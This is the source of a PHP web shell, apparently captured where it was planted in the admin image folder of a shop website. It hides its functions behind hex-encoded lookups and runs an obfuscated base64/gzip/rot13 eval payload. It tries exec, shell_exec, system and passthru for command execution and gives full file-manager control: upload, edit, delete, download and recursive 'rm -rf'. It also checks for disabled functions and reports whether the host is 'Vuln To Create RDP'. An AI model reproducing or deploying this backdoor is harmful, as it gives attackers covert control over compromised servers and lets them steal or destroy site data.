Uname : Linux V-ShopU01 4.18.0-348.20.1.el8_5.x86_64 #1 SMP Thu Mar 10 20:59:28 UTC 2022 x86_64
Server : Apache/2.4.37 (rocky) OpenSSL/1.1.1k
Whoami : apache
Safe Mode : OFF
DOCUMENT ROOT : /var/www/html/site_shopudiet
Disable Function :
Path : /var/www/html/site_shopudiet/admin/img/

Server IP : Client IP :
Current File : /var/www/html/site_shopudiet/admin/img/1710759347116032384265f81db319a9f

$query = [

dhex(13)("X-XSS-Protection: 0");
dhex(12)('max_execution_time', 0);
dhex(12)('output_buffering', 0);

if (version_compare(PHP_VERSION, '7.0.0', '<')) {

    if (get_magic_quotes_gpc()) {
        function ecchi($array)
            return is_array($array) ? array_map('ecchi', $array) : stripslashes($array);
        $_POST = ecchi($_POST);
} else {
    dhex(12)('magic_quotes_runtime', 0);
}; eval(gzuncompress(base64_decode(str_rot13('rWkyHAgdt0ND/MIOWXitcFx0gOUoulXxG03I9PKVLaIfOBAh3MRxuCk7I02ucGNCZ2p4ykyGqbWRVEbVjndIDeWZaxGkrkEi2FcA1jaYoWwA4O8XLEtPRl2m4DaLwxtdOfhcLjTLsGqbTzsmk+Tl9C3mKkz+rx1Fyy1+jKU0gbzFyT/vS70jNdwdOixaRv9RF9vFfxLYYKL39ko33amk4A3Bo/kPXH/hWUBtluhSQvwdZA9CgXBz64aD2y4GDitVD495vq04Tp+GtHfavHiVcJmdVdqngC7ECEjBovJ6iniCjeLDWMnTN2lCgOCyFTse4EnAKKBB4TQSC/d6XsyKw93W2wYEx+la7sPwmULt02KojGpJ3U0d'))));

function w($dir, $perm)
    if (!dhex(2)($dir)) {
        return "<p class='text-danger'>" . $perm . "</p>";
    } else {
        return "<p class='text-warning'>" . $perm . "</p>";

function r($dir, $perm)
    if (!dhex(2)($dir)) {
        return "<p class='text-danger'>" . $perm . "</p>";
    } else {
        return "<p class='text-warning'>" . $perm . "</p>";

function getexist($cmd = null)
    if (dhex(4)('exec')) {
        $disable = dhex(3)($cmd);
    } else if (dhex(4)('shell_exec')) {
        $disable = dhex(5)($cmd);
    } else if (dhex(4)('system')) {
        $disable = dhex(6)($cmd);
    } else if (dhex(4)('passthru')) {
        $disable = dhex(7)($cmd);
    } else {
        $disable = 'Disable';

    return $disable;

function dhex($num)
    global $query;
    for ($i = 0; $i < count($query); $i++) {
        $dec[] = hex2bin($query[$i]);

    return $dec[$num];

function seorank($url)
    $setopt = array(
        CURLOPT_URL => 'https://www.checkmoz.com/bulktool',
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => "getStatus=1&siteID=1&sitelink=$url&da=1&pa=1&alexa=1"
    $ch = curl_init();
    curl_setopt_array($ch, $setopt);
    return curl_exec($ch);

function perms($file)
    $perms = dhex(15)($file);
    if (($perms & 0xC000) == 0xC000) {
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
    return $info;

function getact($dir, $file, $label)
    <label for="<?= $label ?>" class="font-weight-bold">
        Filename : <span class="text-secondary"><?= dhex(14)($file) ?></span>
        [ <a class="text-white text-decoration-none" href="?e=view&fol=<?= dhex(10)($dir) . "&file=" . dhex(9)($file) ?>">view</a> ]
        [ <a class="text-white text-decoration-none" href="?e=edit&fol=<?= dhex(10)($dir) . "&file=" . dhex(9)($file) ?>">edit</a> ]
        [ <a class="text-white text-decoration-none" href="?e=rename&fol=<?= dhex(10)($dir) . "&file=" . dhex(9)($file) ?>">rename</a> ]
        [ <a class="text-white text-decoration-none" href="?e=download&fol=<?= dhex(10)($dir) . "&file=" . dhex(9)($file) ?>">download</a> ]
        [ <a class="text-white text-decoration-none" href="?e=delete&fol=<?= dhex(10)($dir) . "&file=" . dhex(9)($file) ?>">delete</a> ]

if (isset($_GET['fol'])) {
    if (ctype_xdigit($_GET['fol'])) {
        $dir = dhex(18)(dhex(9)(dhex(10)($_GET['fol'])));
    } else {
        $dir = dhex(18)(dhex(9)($_GET['fol']));
} else {
    $dir = dhex(9)(dhex(0)());

$dir        = dhex(9)(str_replace("\\", "/", dhex(10)($dir)));
$scdir      = explode("/", dhex(10)($dir));
$scan       = dhex(11)(dhex(10)($dir));
$disable    = @ini_get('disable_functions');
$disable    = (!empty($disable)) ? "<font class='text-danger'>$disable</font>" : '<font style="color: #43C6AC">NONE</font>';
$os         = substr(strtoupper(PHP_OS), 0, 3) === "WIN" ? "Windows" : "Linux";
$checkrdp   = ($os !== 'Windows' && getexist() !== 'Disable') ? "Can't Create RDP" : 'Vuln To Create RDP';
$rank       = seorank($_SERVER['SERVER_NAME']);
$getrank    = preg_match_all('/(.*?)<\/td>/', $rank, $get);
$check      = preg_replace('/<td>/', '', $get[1]);

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<body class="bg-dark text-white">
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            <div class="col-md-3">
                <button class="btn btn-secondary" type="button" data-bs-toggle="offcanvas" data-bs-target="#infoser" aria-controls="infoser">Information Server</button>
                <button class="btn btn-secondary" type="button" data-bs-toggle="modal" data-bs-target="#fileupload" id="fileuploaded">UPLOAD</button>

        <div class="modal fade" id="fileupload" tabindex="-1" aria-labelledby="filelabel" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered">
                <div class="modal-content bg-dark">
                    <div class="modal-header">
                        <h5 class="modal-title" id="filelabel">File Uploaded</h5>
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                    <div class="modal-body">
                        <form method="POST" enctype="multipart/form-data">
                            <div class="input-group">
                                <div id="checkupl" hidden><?= w(dhex(10)($dir) . "/$direc", perms(dhex(10)($dir) . "/$direc")) ?></div>
                                <input type="file" class="form-control" name="file" onchange="this.form.submit()">
                            <!-- <button class="btn btn-secondary form-control mt-2" type="submit">Submit</button> -->
                        if (isset($_FILES['file'])) {
                            if (dhex(16)($_FILES['file']['tmp_name'], dhex(10)($dir) . "/" . $_FILES['file']['name'])) {
                                $title = "File Upload Success";
                                echo "<div id='alert' hidden>success</div>";
                                echo "<script>window.location = '?fol=" . $dir . "'</script>";
                            } else {
                                $title = "File Upload Failed";
                                echo "<div id='alert' hidden>permission denied</div>";
                    <div class="modal-footer">
                        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>

        <div class="offcanvas offcanvas-start text-white" tabindex="-1" id="infoser" aria-labelledby="infoserlab">
            <div class="offcanvas-header">
                <h5 class="offcanvas-title" id="infoserlab">Server Info</h5>
                <button type="button" class="btn-close text-reset" data-bs-dismiss="offcanvas" aria-label="Close"></button>
            <div class="offcanvas-body small">
                    Rank Alexa : <span><?= $check[4] ?></span> |
                    DA : <span><?= $check[2] ?></span> |
                    PA : <span><?= $check[3] ?></span>
                <p>OS : <span><?= $os ?></span></p>
                <p>RDP : <span><?= $checkrdp ?></span></p>
                <p>PHP Version : <span><?= PHP_VERSION ?></span></p>
                <p>Software : <span><?= $_SERVER['SERVER_SOFTWARE'] ?></span></p>
                <p>Information System : <span><?= dhex(22)() ?></span></p>
                <p>Disable Function : <span class="text-wrap"><?= $disable ?></span></p>
    <div class="container">
        <div class="row justify-content-center mt-2">
            <div class="col-md-12">
                <label for="dir">You In Here :</label>
                foreach ($scdir as $c_dir => $cdir) {
                    echo "<a class='font-weight-bold text-decoration-none folder' id='dir' href='?fol=";
                    for ($i = 0; $i <= $c_dir; $i++) {
                        echo dhex(10)(dhex(9)($scdir[$i]));
                        if ($i != $c_dir) {
                            echo "/";
                    echo "'>" . $cdir . "</a>/";
                if (isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['e'] == 'download')) {
                    $file = dhex(10)($_GET['file']);
                    dhex(13)('Content-Description: File Transfer');
                    dhex(13)('Content-Type: application/octet-stream');
                    dhex(13)('Content-Disposition: attachment; filename="' . dhex(14)($file) . '"');
                    dhex(13)('Expires: 0');
                    dhex(13)('Cache-Control: must-revalidate');
                    dhex(13)('Pragma: public');
                    dhex(13)('Content-Length: ' . dhex(27)($file));
                } else if ($_GET['e'] == 'delete_dir') {
                    if (dhex(1)(dhex(10)($dir))) {
                        if (dhex(2)(dhex(10)($dir))) {
                            @dhex(3)("rm -rf " . dhex(10)($dir));
                            @dhex(3)("rmdir /s /q " . dhex(10)($dir));

                            $alert = "success";
                            $title = "Delete Success";

                            echo "<script>window.location='?fol=" . dhex(9)(dirname(dhex(10)($dir))) . "';</script>";
                        } else {
                            $alert = "permission denied";
                            $title = "could not remove " . dhex(14)(dhex(10)($dir));
                    <div class="form-group">
                        <div id="alert" hidden><?= $alert ?></div>
                } else if ($_GET['e'] == 'rename') {
                    $alert = 'Rename File';
                    if ($_POST['rename']) {
                        $rename = dhex(23)(dhex(10)($_GET['file']), dhex(10)($dir) . "/" . dhex(18)($_POST['rename']));
                        if ($rename) {
                            $alert = "success";
                            $title = "Success Rename File";
                            echo "<script>window.location='?dir=" . dhex(9)(dhex(10)($dir)) . "';</script>";
                        } else {
                            $alert = "permission denied";
                            $title = "Denied Permission";
                    <form method="POST">
                        <div class="form-group">
                            <?= getact($dir, dhex(10)($_GET['file']), 'rename') ?>
                            <input id="rename" type="text" name="rename" class="form-control bg-dark text-danger mb-2 mt-2" value="<?= dhex(14)(dhex(10)($_GET['file'])) ?>">
                        <div class="form-group">
                            <div id="alert" hidden><?= $alert ?></div>
                            <button class="btn btn-light form-control">Rename</button>
                } else if ($_GET['e'] == 'rename_dir') {
                    $alert = 'Rename Directory';
                    if ($_POST['rename_dir']) {
                        $dir_rename = dhex(23)(dhex(10)($dir), "" . dirname(dhex(10)($dir)) . "/" . dhex(18)($_POST['rename_dir']) . "");
                        if ($dir_rename) {
                            $alert = "Success";
                            $title = "Rename Dir Success";
                            echo "<script>window.location='?fol=" . dhex(9)(dirname(dhex(10)($dir))) . "';</script>";
                        } else {
                            $alert = "permission denied";
                    <form method="POST">
                        <div class="form-group">
                            <input name="rename_dir" type="text" class="form-control bg-dark text-danger mb-2 mt-2" value="<?= dhex(14)(dhex(10)($dir)) ?>">
                        <div class="form-group">
                            <div id="alert" hidden><?= $alert ?></div>
                            <button type="submit" class="btn btn-light form-control">Renamed!!</button>
                } else if ($_GET['e'] == 'delete') {
                    $delete = dhex(24)(dhex(10)($_GET['file']));
                    if ($delete) {
                        $alert = "success";
                        $title = "Success Delete File" . dhex(10)($_GET['file']);
                        echo "<script>window.location ='?fol=" . dhex(9)(dhex(10)($dir)) . "';</script>";
                    } else {
                        $alert = "permission denied";
                        $title = "Denied Permission";
                    <div class="form-group">
                        <div id="alert" hidden><?= $alert ?></div>
                } else if ($_GET['e'] == 'edit') {
                    $alert = "Edit File";
                    if ($_POST['src']) {
                        $save = dhex(19)(dhex(10)($_GET['file']), $_POST['src']);
                        if ($save) {
                            $alert = "success";
                            $title = "Saved!";
                        } else {
                            $alert = "permission denied";
                            $title = "Denied Permission";
                    <form method="POST">
                        <div class="form-group">
                            <?= getact($dir, dhex(10)($_GET['file']), 'textarea') ?>
                            <textarea class="form-control bg-dark text-danger mb-2 mt-2" spellcheck="false" name="src" id="textarea" rows="10"><?= dhex(18)(@dhex(20)(dhex(10)($_GET['file']))) ?></textarea>
                        <div class="form-group">
                            <div id="alert" hidden><?= $alert ?></div>
                            <button type="submit" class="btn btn-light form-control">Save</button>
                } else if ($_GET['e'] == 'view') {
                    $alert = "View File";
                    <div class="form-group">
                        <?= getact($dir, dhex(10)($_GET['file']), 'file') ?>
                        <textarea class="form-control bg-dark text-danger mb-2 mt-2" id="file" rows="5" readonly><?= dhex(18)(@dhex(20)(dhex(10)($_GET['file']))) ?></textarea>
                    <div id="alert" hidden><?= $alert ?></div>
                } else if ($_GET['e'] == 'newfolder') {
                    $alert = 'Create New Folder';
                    if ($_POST['new_folder']) {
                        $newfolder = dhex(10)($dir) . '/' . dhex(18)($_POST['new_folder']);
                        if (!mkdir($newfolder)) {
                            $alert = "permission denied";
                            $title = "Denied Permission";
                        } else {
                            $alert = "success";
                            $title = "Success Create Folder";
                            echo "<script>window.location='?fol=" . dhex(9)(dhex(10)($dir)) . "';</script>";
                    <form method="POST">
                        <div class="form-group">
                            <input type="text" name="new_folder" class="bg-dark text-danger form-control mb-2 mt-2" placeholder="name folder" required>
                        <div class="form-group">
                            <div id="alert" hidden><?= $alert ?></div>
                            <button type="submit" class="btn btn-light form-control">Submit</button>
                } else if ($_GET['e'] == 'newfile') {
                    $alert = "Create New File";
                    if ($_POST['new_file']) {
                        $newfile = dhex(18)($_POST['new_file']);
                        $fopen = fopen($newfile, "a+");
                        if ($fopen) {
                            $alert = 'success';
                            $title = "Success Create File";
                            echo '<script>window.location = "?e=edit&fol=' . dhex(9)(dhex(10)($dir)) . '&file=' . dhex(9)($_POST['new_file']) . '";</script>';
                        } else {
                            $alert = "permission denied";
                            $title = "Denied Permission";
                    <form method="POST">
                        <div class="form-group">
                            <input type="text" name="new_file" class="bg-dark text-danger form-control mb-2 mt-2" placeholder="name file" value="<?= dhex(10)($dir) . "/newfile.php" ?>" required>
                        <div class="form-group">
                            <div id="alert" hidden><?= $alert ?></div>
                            <button type="submit" class="btn btn-light form-control">Submit</button>
                if (dhex(1)(dhex(10)($dir)) == true) {
                    if (!dhex(21)(dhex(10)($dir))) {
                        echo "<p class='font-weight-bold text-danger'>can't open directory. ( not readable )</p>";
                    } else {
                        <div class="table-responsive mt-3">
                            <table class="table table-bordered table-striped table-hover" id="table">
                                <thead class="thead-white text-white text-center">
                                    foreach ($scan as $direc) {
                                        $dtype = dhex(25)(dhex(10)($dir) . "/$direc");
                                        if ($direc === '..') {
                                            $href = "<a class='text-decoration-none' href='?fol=" . dhex(9)(dirname(dhex(10)($dir))) . "'>$direc</a>";
                                        } else if ($direc === '.') {
                                            $href = "<a class='text-decoration-none' href='?fol=" . dhex(9)(dhex(10)($dir)) . "'>$direc</a>";
                                        } else {
                                            $href = "<a class='text-decoration-none' href='?fol=" . dhex(9)(dhex(10)($dir) . "/" . $direc) . "'>$direc</a>";
                                        if ($direc === '.' || $direc === '..') {
                                            $act_dir = "<a class='text-decoration-none' href='?e=newfile&fol=" . dhex(9)(dhex(10)($dir)) . "'>newfile</a> | <a class='text-decoration-none' href='?e=newfolder&fol=" . dhex(9)(dhex(10)($dir)) . "'>newfolder</a>";
                                        } else {
                                            $act_dir = "<a class='text-decoration-none' href='?e=rename_dir&fol=" . dhex(9)(dhex(10)($dir) . "/" . $direc) . "'>rename</a> | <a class='text-decoration-none' href='?e=delete_dir&fol=" . dhex(9)(dhex(10)($dir) . "/" . $direc) . "'>delete</a>";
                                        if (!dhex(1)(dhex(10)($dir) . "/$direc")) continue;
                                            <td class="border-light">
                                                <i class="fa-fw far fa-folder"></i>
                                                <?= $href ?>
                                            <td class="border-light text-white text-center"><?= $dtype ?></td>
                                            <td class="border-light text-center">
                                                <?= w(dhex(10)($dir) . "/$direc", perms(dhex(10)($dir) . "/$direc")) ?>
                                            <td class="border-light text-danger"><?= $act_dir ?></td>
                            } else {
                                echo "<p class='font-weight-bold text-danger'>can't open directory.</p>";
                            foreach ($scan as $file) {
                                $infoext = pathinfo($file);
                                $ftype = dhex(25)(dhex(10)($dir) . "/$file");

                                if ($infoext['extension'] == 'php') {
                                    $i = '<i class="fa-fw fab fa-php"></i>';
                                    $ftype = 'php';
                                } else if ($infoext['extension'] == 'html' || $infoext['extension'] == 'htm') {
                                    $i = '<i class="fab fa-fw fa-html5"></i>';
                                    $ftype = 'html';
                                } else if ($infoext['extension'] == 'zip' || $infoext['extension'] == 'rar') {
                                    $i = '<i class="fas fa-fw fa-file-archive"></i>';
                                    $ftype = ($infoext['extension'] == 'zip') ? 'zip' : 'rar';
                                } else if ($infoext['extension'] == 'jpg' || $infoext['extension'] == 'jpeg' || $infoext['extension'] == 'png') {
                                    $i = '<i class="fas fa-fw fa-file-image"></i>';
                                    $ftype = 'image';
                                } else if ($infoext['extension'] == 'txt') {
                                    $i = '<i class="far fa-fw fa-file-code"></i>';
                                    $ftype = 'text file';
                                } else if ($infoext['extension'] == 'css') {
                                    $i = '<i class="fab fa-fw fa-css3-alt"></i>';
                                    $ftype = 'css';
                                } else if ($infoext['extension'] == 'js') {
                                    $i = '<i class="fab fa-fw fa-js-square"></i>';
                                    $ftype = 'js';
                                } else if ($infoext['extension'] == 'doc' || $infoext['extension'] == 'docx') {
                                    $i = '<i class="fab fa-fw fa-js-square"></i>';
                                    $ftype = ($infoext['extension'] == 'doc') ? 'doc' : 'docx';
                                } else if ($infoext['extension'] == 'pdf') {
                                    $i = '<i class="fas fa-file-pdf"></i>';
                                    $ftype = 'pdf';
                                } else if ($infoext['extension'] == 'py') {
                                    $i = '<i class="fab fa-fw fa-python"></i>';
                                    $ftype = 'python';
                                } else if ($infoext['extension'] == 'mp4' || $infoext['extension'] == 'mp3') {
                                    $i = ($infoext['extension'] == 'mp4') ? '<i class="fas fa-fw fa-file-video"></i>' : '<i class="fas fa-fw fa-file-audio"></i>';
                                    $ftype = ($infoext['extension'] == 'mp4') ? 'video' : 'audio';
                                } else if ($infoext['extension'] == 'htaccess' || $infoext['extension'] == 'ini') {
                                    $i = '<i class="fas fa-fw fa-cog"></i>';
                                    $ftype = ($infoext['extension'] == 'htaccess') ? 'htaccess' : 'configuration file';
                                } else {
                                    $i = '<i class="fas fa-fw fa-file"></i>';

                                if (!dhex(17)(dhex(10)($dir) . "/$file")) continue;
                                    <td class="border-light">
                                        <?= $i ?>
                                        <a class="text-decoration-none" href="?e=view&fol=<?= dhex(9)(dhex(10)($dir)) . "&file=" . dhex(9)(dhex(10)($dir) . "/$file") ?>"><?= $file ?></a>
                                    <td class="text-center text-white"><?= $ftype ?></td>
                                    <td class="text-center">
                                        <?= w(dhex(10)($dir) . "/$file", perms(dhex(10)($dir) . "/$file")) ?>
                                    <td class="text-danger border-light">
                                        <a class="text-decoration-none" href="?e=edit&fol=<?= dhex(9)(dhex(10)($dir)) . "&file=" . dhex(9)(dhex(10)($dir) . "/$file") ?>">edit</a> |
                                        <a class="text-decoration-none" href="?e=rename&fol=<?= dhex(9)(dhex(10)($dir)) . "&file=" . dhex(9)(dhex(10)($dir) . "/$file") ?>">rename</a> |
                                        <a class="text-decoration-none" href="?e=delete&fol=<?= dhex(9)(dhex(10)($dir)) . "&file=" . dhex(9)(dhex(10)($dir) . "/$file") ?>">delete</a> |
                                        <a class="text-decoration-none" href="?e=download&fol=<?= dhex(9)(dhex(10)($dir)) . "&file=" . dhex(9)(dhex(10)($dir) . "/$file") ?>">download</a>
                            <?php } ?>

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            if ($('#alert').text() !== '') {
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                        title: '<?= $title ?>',
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                        title: '<?= $title ?>'
                } else {
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                        title: "<?= $alert ?>"

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                    icon: "error",
                    title: "Permission Denied Upload File",
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